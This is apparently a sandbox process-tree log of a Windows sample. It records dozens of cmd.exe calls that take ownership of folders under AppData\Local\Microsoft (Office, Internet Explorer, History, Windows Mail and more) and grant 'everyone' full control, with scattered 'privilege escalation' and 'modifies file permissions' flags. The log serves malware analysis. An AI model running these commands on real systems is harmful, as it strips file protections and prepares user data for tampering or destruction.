C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~ /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~ && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~ /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2GZYAHYN && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2GZYAHYN /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2GZYAHYN3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\3CPCT0UC && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\3CPCT0UC /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\3CPCT0UC3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7T9C8S0D && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7T9C8S0D /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7T9C8S0D3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\98I61CZ5 && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\98I61CZ5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\98I61CZ53⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BNS2IARI && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BNS2IARI /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BNS2IARI3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BU8Z15XV && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BU8Z15XV /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BU8Z15XV3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\T317UL6X && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\T317UL6X /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\T317UL6X3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\XW1885AL && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\XW1885AL /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\XW1885AL3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\85y7ywt && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\85y7ywt /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\85y7ywt3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440 && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-28451624403⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290 && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin97280602903⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection && icacls C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00006279 && icacls C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00006279 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\000062793⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office && icacls C:\Users\Admin\AppData\Local\Microsoft\Office /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\14.0 && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\14.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\14.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\14.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User && icacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\PlayReady && icacls C:\Users\Admin\AppData\Local\Microsoft\PlayReady /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\PlayReady3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\PlayReady /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE53⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024100120241002 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024100120241002 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist0120241001202410023⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024100120241002 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE53⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\48RNM7SN && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\48RNM7SN /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\48RNM7SN3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RXRX1VH && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RXRX1VH /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4RXRX1VH3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84790KOV && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84790KOV /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84790KOV3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BRLV7L3G && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BRLV7L3G /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BRLV7L3G3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J7FHNNOW && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J7FHNNOW /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J7FHNNOW3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JF1SL0MP && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JF1SL0MP /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JF1SL0MP3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OX8Z8GR5 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OX8Z8GR5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OX8Z8GR53⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup3⤵
-
-
-
